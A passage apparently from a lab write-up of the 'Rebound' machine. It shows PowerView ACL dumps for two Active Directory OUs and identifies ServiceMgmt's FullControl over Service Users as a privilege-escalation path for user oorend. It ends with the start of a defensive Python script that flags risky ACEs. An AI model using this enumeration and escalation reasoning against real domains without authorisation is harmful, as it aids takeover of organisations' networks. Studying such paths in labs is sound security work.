There are only these two. So we can hypothesise that adding oorend to ServiceMgmt might give us a privilege escalation. We can confirm this through the domain controllers' ACLs: first specify the Domain Controllers OU and inspect its ACL. (Most core PowerView commands belong to the Get-Domain* family, so you can tab-complete from there.) However, these entries are essentially unrelated to the two users we currently have.

Get-DomainObjectAcl -Identity "OU=Domain Controllers,DC=rebound,DC=htb"
ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Read
AccessMask : Read
InheritanceType : None
SecurityIdentifier : Authenticated Users

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : ReadAndExecute
AccessMask : ReadAndExecute
InheritanceType : None
SecurityIdentifier : REBOUND\Domain Admins

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : FullControl
AccessMask : FullControl
InheritanceType : None
SecurityIdentifier : Local System

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Read
AccessMask : Read
InheritanceType : None
SecurityIdentifier : Enterprise Domain Controllers

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Account-Restrictions
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Account-Restrictions
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Logon
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Logon
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Membership
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Membership
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : General-Information
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : General-Information
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : RAS-Information
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : RAS-Information
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ReadProperty, WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : ms-DS-Key-Credential-Link
InheritanceType : None
SecurityIdentifier : REBOUND\Key Admins

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ReadProperty, WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : ms-DS-Key-Credential-Link
InheritanceType : None
SecurityIdentifier : REBOUND\Enterprise Key Admins

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : Self
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : DS-Validated-Write-Compute
InheritanceType : Computer
SecurityIdentifier : Creator Owner

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : Self
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : DS-Validated-Write-Compute
InheritanceType : Computer
SecurityIdentifier : Principal Self

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Token-Groups
InheritanceType : Computer
SecurityIdentifier : Enterprise Domain Controllers

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Token-Groups
InheritanceType : Group
SecurityIdentifier : Enterprise Domain Controllers

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Token-Groups
InheritanceType : User
SecurityIdentifier : Enterprise Domain Controllers

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : ms-TPM-Tpm-Information-For-Computer
InheritanceType : Computer
SecurityIdentifier : Principal Self

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : Group
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE, OBJECT_INHERIT_ACE
AccessMask : ReadProperty, WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
InheritanceType : None
SecurityIdentifier : Principal Self

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ControlAccess, ReadProperty, WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : Private-Information
InheritanceType : None
SecurityIdentifier : Principal Self

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights : FullControl
AccessMask : FullControl
InheritanceType : None
SecurityIdentifier : REBOUND\Enterprise Admins

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights : ListChildObjects
AccessMask : ListChildObjects
InheritanceType : None
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights : ReadAndExecute
AccessMask : ReadAndExecute
InheritanceType : None
SecurityIdentifier : Administrators

Now look at the other OU.

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainObjectAcl -Identity "OU=Service Users,DC=rebound,DC=htb"
ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : None
AccessMask : CreateChild, DeleteChild
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : inetOrgPerson
InheritanceType : None
SecurityIdentifier : Account Operators

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : None
AccessMask : CreateChild, DeleteChild
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : Computer
InheritanceType : None
SecurityIdentifier : Account Operators

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : None
AccessMask : CreateChild, DeleteChild
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : Group
InheritanceType : None
SecurityIdentifier : Account Operators

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : None
AccessMask : CreateChild, DeleteChild
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : Print-Queue
InheritanceType : None
SecurityIdentifier : Print Operators

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : None
AccessMask : CreateChild, DeleteChild
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : User
InheritanceType : None
SecurityIdentifier : Account Operators

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : FullControl
AccessMask : FullControl
InheritanceType : None
SecurityIdentifier : REBOUND\Domain Admins

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : FullControl
AccessMask : FullControl
InheritanceType : None
SecurityIdentifier : REBOUND\ServiceMgmt

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Read
AccessMask : Read
InheritanceType : None
SecurityIdentifier : Enterprise Domain Controllers

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Read
AccessMask : Read
InheritanceType : None
SecurityIdentifier : Authenticated Users

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : FullControl
AccessMask : FullControl
InheritanceType : None
SecurityIdentifier : Local System

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Account-Restrictions
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Account-Restrictions
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Logon
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Logon
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Membership
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Membership
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : General-Information
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : General-Information
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : RAS-Information
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : RAS-Information
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ReadProperty, WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : ms-DS-Key-Credential-Link
InheritanceType : None
SecurityIdentifier : REBOUND\Key Admins

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ReadProperty, WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : ms-DS-Key-Credential-Link
InheritanceType : None
SecurityIdentifier : REBOUND\Enterprise Key Admins

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : Self
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : DS-Validated-Write-Compute
InheritanceType : Computer
SecurityIdentifier : Creator Owner

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : Self
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : DS-Validated-Write-Compute
InheritanceType : Computer
SecurityIdentifier : Principal Self

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Token-Groups
InheritanceType : Computer
SecurityIdentifier : Enterprise Domain Controllers

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Token-Groups
InheritanceType : Group
SecurityIdentifier : Enterprise Domain Controllers

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Token-Groups
InheritanceType : User
SecurityIdentifier : Enterprise Domain Controllers

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : ms-TPM-Tpm-Information-For-Computer
InheritanceType : Computer
SecurityIdentifier : Principal Self

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : inetOrgPerson
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : Group
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE, OBJECT_INHERIT_ACE
AccessMask : ReadProperty, WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
InheritanceType : None
SecurityIdentifier : Principal Self

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ControlAccess, ReadProperty, WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : Private-Information
InheritanceType : None
SecurityIdentifier : Principal Self

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights : FullControl
AccessMask : FullControl
InheritanceType : None
SecurityIdentifier : REBOUND\Enterprise Admins

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights : ListChildObjects
AccessMask : ListChildObjects
InheritanceType : None
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights : ReadAndExecute
AccessMask : ReadAndExecute
InheritanceType : None
SecurityIdentifier : Administrators

Notice that ServiceMgmt appears in the ACL of the Service Users OU with FullControl:

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : FullControl
AccessMask : FullControl
InheritanceType : None
SecurityIdentifier : REBOUND\ServiceMgmt
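
The two ACL dumps above are long, and the one ACE that matters (ServiceMgmt with FullControl on the OU) is easy to miss. As an added example, not code from the write-up or from PowerView, here is a small Python auditor that parses the "Key : Value" records Get-DomainObjectAcl prints and flags ACEs that hand control rights, writes to sensitive attributes such as ms-DS-Key-Credential-Link, or forced password resets to principals outside an assumed administrative allowlist. It handles both the PowerView.py form shown here and the PowerView.ps1 form (numeric AccessMask, ActiveDirectoryRights, IsInherited) used later in the write-up, so it goes beyond this one OU. The allowlist, the sensitive-attribute list and the REBOUND\helpdesk principal in the sample are assumptions of the example; the other two sample records are trimmed copies of the output above.

```python
"""Audit PowerView-style ACE dumps for control rights held by unexpected principals.
Added example, not code from the write-up or from PowerView. Parses the "Key : Value"
records Get-DomainObjectAcl prints (PowerView.py names the rights; PowerView.ps1
prints a numeric AccessMask plus ActiveDirectoryRights and IsInherited).
"""
from collections import namedtuple

# ADS_RIGHT_* bits ([MS-ADTS] 5.1.3.2), used when AccessMask is numeric.
ACCESS_MASK_BITS = {0x1: "CreateChild", 0x2: "DeleteChild", 0x4: "ListChildren", 0x8: "Self",
                    0x10: "ReadProperty", 0x20: "WriteProperty", 0x40: "DeleteTree",
                    0x80: "ListObject", 0x100: "ExtendedRight", 0x10000: "Delete",
                    0x20000: "ReadControl", 0x40000: "WriteDacl", 0x80000: "WriteOwner"}
CONTROL_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner"}
# Attributes whose write access hands the object over (lower-cased schema names).
SENSITIVE_ATTRIBUTES = {"ms-ds-key-credential-link", "member",
                        "ms-ds-allowed-to-act-on-behalf-of-other-identity"}
# Control-access-right GUIDs, as PowerView.ps1 prints them in ObjectAceType.
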